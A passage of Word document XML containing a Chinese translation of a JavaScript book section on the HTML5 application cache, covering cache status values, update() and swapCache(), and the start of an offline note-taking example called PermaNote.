      </w:r>
      <w:r>
        <w:t>事件，并</w:t>
      </w:r>
      <w:r>
        <w:t>将该应用程序从缓存中移除。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>除了使用事件处理程序之外，还可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>applicationCache.status</w:t>
      </w:r>
      <w:r>
        <w:t>属性来查看当前缓存状态。该属性有</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>个可能的属性值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ApplicationCache.UNCACHED(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>应用程序没有设置</w:t>
      </w:r>
      <w:r>
        <w:t>manifest</w:t>
      </w:r>
      <w:r>
        <w:t>属性：未缓存</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ApplicationCache.IDLE(1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>清单文件已经检查完毕，并且已经缓存了最新的应用程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ApplicationCache.CHECKING(2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>浏览器正在检查清单文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ApplicationCache.DOWNLOADING(3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>浏览器正在下载并缓存清单中列举的所有文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ApplicationCache.UPDATEREADY(4)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>已经下载和缓存了最新版的应用程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ApplicationCache.OBSOLETE(5)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>清单文件不存在，缓存将被清除</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ApplicationCache</w:t>
      </w:r>
      <w:r>
        <w:t>对象还定义了两个方法：</w:t>
      </w:r>
      <w:r>
        <w:t>update()</w:t>
      </w:r>
      <w:r>
        <w:t>方法显式调用了更新缓存算法以检测是否有最新版本的应用程序。这导致浏览器检测同一个清单文件（并触发相同的事件），这和第一次载入应用程序时的效果是一样的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>还有一个方法是</w:t>
      </w:r>
      <w:r>
        <w:t>swapCache()</w:t>
      </w:r>
      <w:r>
        <w:t>，该方法更加巧妙。还记得</w:t>
      </w:r>
      <w:r>
        <w:t>当浏览器下载并缓存更新版本的应用时，用户仍然在运行老版本的应用吧。只有当用户再次载入应用时，才会访问到最新版本。但是如果用户没有重新载入，就必须要保证老版本的应用也要工作正常。同时要注意的是，老版本应用程序的相关资源可能是从缓存中加载的：比如，应用程序可能使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>去获取文件，而这些请求也务必要保证能够从老版本缓存中的文件获取到。因此，浏览器在用户再次载入应用前必须在缓存中保留老版本的应用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>swapCache()</w:t>
      </w:r>
      <w:r>
        <w:t>方法告诉浏览器它可以弃用老的缓存，所有的请求都从新缓存中获取。要注意的是</w:t>
      </w:r>
      <w:r>
        <w:t>，这并不会重新载入应用程序：所有已经载入的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文件、图片、脚本等资源都不会改变。但是，之后的请求都将从最新的缓存中获取。这会导致</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>版本错乱</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的问题，因此，一般不推荐使用，除非应用程序设计得很好，确保这样的方式没有问题。想象下，比方说，有这么个应用程序，它什么也不做，就只是在浏览器检查清单文件的整个过程中，显示过渡画面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>。触发</w:t>
      </w:r>
      <w:r>
        <w:t>"noupdate"</w:t>
      </w:r>
      <w:r>
        <w:t>事件时，它继续</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>前进</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>并载入应用程序的首页。触发</w:t>
      </w:r>
      <w:r>
        <w:t>"downloading"</w:t>
      </w:r>
      <w:r>
        <w:t>事件，并且更新缓存后，它显示合适的反馈给用户。触发</w:t>
      </w:r>
      <w:r>
        <w:t>"updateready"</w:t>
      </w:r>
      <w:r>
        <w:t>事件时，</w:t>
      </w:r>
      <w:r>
        <w:t>它调用</w:t>
      </w:r>
      <w:r>
        <w:t>swapCache()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，然后从最新的缓存中载入更新过的首页。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要注意的是，只有当状态属性是</w:t>
      </w:r>
      <w:r>
        <w:t>ApplicationCache.UPDATEREADY</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>ApplicationCache.OBSOLETE</w:t>
      </w:r>
      <w:r>
        <w:t>时，调用</w:t>
      </w:r>
      <w:r>
        <w:t>swapCache()</w:t>
      </w:r>
      <w:r>
        <w:t>方法才有意义（当状态是</w:t>
      </w:r>
      <w:r>
        <w:t>OBSOLETE</w:t>
      </w:r>
      <w:r>
        <w:t>时，调用</w:t>
      </w:r>
      <w:r>
        <w:t>swapCache()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可以立即弃用废弃的缓存，让之后所有的请求都通过网络获取）。如果在状态属性是其他数值的时候调用</w:t>
      </w:r>
      <w:r>
        <w:t>swapCache()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，它就会抛出异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="520" w:name="20_4_3_Li_Xian_WebYing_Yong_"/>
      <w:r>
        <w:t>20.4.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　离线</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="520"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>离线</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用指的是将自己</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>在应用程序缓存中的程序，使得哪怕在浏览器处于离线状态时候依然可访问它。举个最简单的例子</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>类似时钟和万花筒生成器这样的应用</w:t>
      </w:r>
      <w:r>
        <w:t>——Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用要离线可用需要做的事情。但是，大多数重要的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用也需要向服务器上传数据：哪怕是简单的游戏应用都有可能需要把用户的最高得分上传到服务器上。这类应用也可以成为离线应用。它们可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>来存储应用数据，然后当在线的时候再将数据上传到服</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>务器。在本地存储和服务器端同步数据是将</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用转变为离线应用最巧妙的环节，特别是当用户需要从多台设备获取数据的时候。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>了在离线状态可用，</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用需要可以告知别人自己是离线还是在线，同时当网络连接的状态发生改变时候也能</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>感知</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>到。通过</w:t>
      </w:r>
      <w:r>
        <w:t>navigator.onLine</w:t>
      </w:r>
      <w:r>
        <w:t>属性，可以检测浏览器是否在线，同时，在</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象上注册在线和离线事件的处理程序，可以检测网络连接状态的改变。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本章将以一个简单的离线</w:t>
      </w:r>
      <w:r>
        <w:t>We b</w:t>
      </w:r>
      <w:r>
        <w:t>应用结束，该应用使用了这些技术。该应用名叫</w:t>
      </w:r>
      <w:r>
        <w:t>"PermaNote"——</w:t>
      </w:r>
      <w:r>
        <w:t>一个简单的记事本程序，它将用户的文本保存到</w:t>
      </w:r>
      <w:r>
        <w:t>locaStorage</w:t>
      </w:r>
      <w:r>
        <w:t>中，并且在网络连接可用的时候</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:t>，将其上传到服务器。</w:t>
      </w:r>
      <w:r>
        <w:t>PermaNote</w:t>
      </w:r>
      <w:r>
        <w:t>只允许用户编辑</w:t>
      </w:r>
      <w:r>
        <w:t>单个笔记，而且不考虑任何授权和身份验证的问题</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>它假设服务端有区分用户的方式，但是不包括任何登录界面。</w:t>
      </w:r>
      <w:r>
        <w:t>PermaNote</w:t>
      </w:r>
      <w:r>
        <w:t>应用包含三个文件。例</w:t>
      </w:r>
      <w:r>
        <w:t>20-5</w:t>
      </w:r>
      <w:r>
        <w:t>是一个缓存清单文件，它列出了另外两个文件，同时指定不需要缓存</w:t>
      </w:r>
      <w:r>
        <w:t>"note"</w:t>
      </w:r>
      <w:r>
        <w:t>这个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>：我们使用此</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>来实现在服务端读写笔记数据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>20-5</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>permanote.appcache</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>CACHE MANIFEST</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>#PermaNote v8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>permanote.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>permanote.js</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>NETWORK:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>note</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>20-6</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>PermaNote</w:t>
      </w:r>
      <w:r>
        <w:t>应用的第二个文件，它是一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文件，定义了一个简单的编辑器的</w:t>
      </w:r>
      <w:r>
        <w:t>UI</w:t>
      </w:r>
      <w:r>
        <w:t>：中间是一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>textarea</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，上面是一排的按钮，下面是消息的一个状态栏。要注意的是，＜</w:t>
      </w:r>
      <w:r>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签设置了</w:t>
      </w:r>
      <w:r>
        <w:t>manifest</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>20-6</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>permanote.html</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 manifest="permanote.appcache"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>head</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>PermaNote Editor</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/title</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script src="permanote.j</w:t>
      </w:r>
      <w:r>
        <w:t>s"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>#editor{width:100%;height:250px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>#statusline{width:100%;}</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div id="toolbar"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>button id="savebutton"onclick="save()"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Save</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/button</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>button onclick="sync()"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Sync Note</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/button</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>button onclick="applicationCache.u</w:t>
      </w:r>
      <w:r>
        <w:t>pdate()"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Update Application</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/button</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/div</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>textarea id="editor"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/textarea</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>div id="statusline"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/div</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lastRenderedPageBreak/>
        <w:t>最后，例</w:t>
      </w:r>
      <w:r>
        <w:t>20-7</w:t>
      </w:r>
      <w:r>
        <w:t>展示的是使</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">PermaNode </w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用正常工作的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码。它定义了一个</w:t>
      </w:r>
      <w:r>
        <w:t>status()</w:t>
      </w:r>
      <w:r>
        <w:t>函数在状态栏上展示消息，一个</w:t>
      </w:r>
      <w:r>
        <w:t>save()</w:t>
      </w:r>
      <w:r>
        <w:t>函数来当前版本的笔记保存到服务器上，以及一个</w:t>
      </w:r>
      <w:r>
        <w:t>sync()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来确保本地副本和服务器端的副本的同步。其中，</w:t>
      </w:r>
      <w:r>
        <w:t>save()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>sync()</w:t>
      </w:r>
      <w:r>
        <w:t>两个函数使用了第</w:t>
      </w:r>
      <w:r>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:t>章介绍的脚本化的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>技术。（有趣的是，</w:t>
      </w:r>
      <w:r>
        <w:t>save()</w:t>
      </w:r>
      <w:r>
        <w:t>函数使用了</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>"PUT"</w:t>
      </w:r>
      <w:r>
        <w:t>方法而不是常见的</w:t>
      </w:r>
      <w:r>
        <w:t>"POST"</w:t>
      </w:r>
      <w:r>
        <w:t>方法。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了这三个基本的函数外，例</w:t>
      </w:r>
      <w:r>
        <w:t>20-7</w:t>
      </w:r>
      <w:r>
        <w:t>还定义了一些事件处理程序。为了保持本地副本和服务器端的副本同步，应用程序需要一些事件处理程序：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>尝试和服务器同步，一旦有新版本的笔记并且完成同步后，就启用编辑器窗口。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>saven()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>sync()</w:t>
      </w:r>
      <w:r>
        <w:t>函数发出</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求，并在</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象上注册一个</w:t>
      </w:r>
      <w:r>
        <w:t>onload</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序来获取上传或者下载完成的提醒。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onbeforeunload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在未上传前，把当前版本的笔记数据保存到服务器上。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>oninput</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>每当＜</w:t>
      </w:r>
      <w:r>
        <w:t>textarea</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素内容发生变化时，都将</w:t>
      </w:r>
      <w:r>
        <w:t>其内容保存到</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>中，并启动一个计时器。当用户停止编辑超过</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
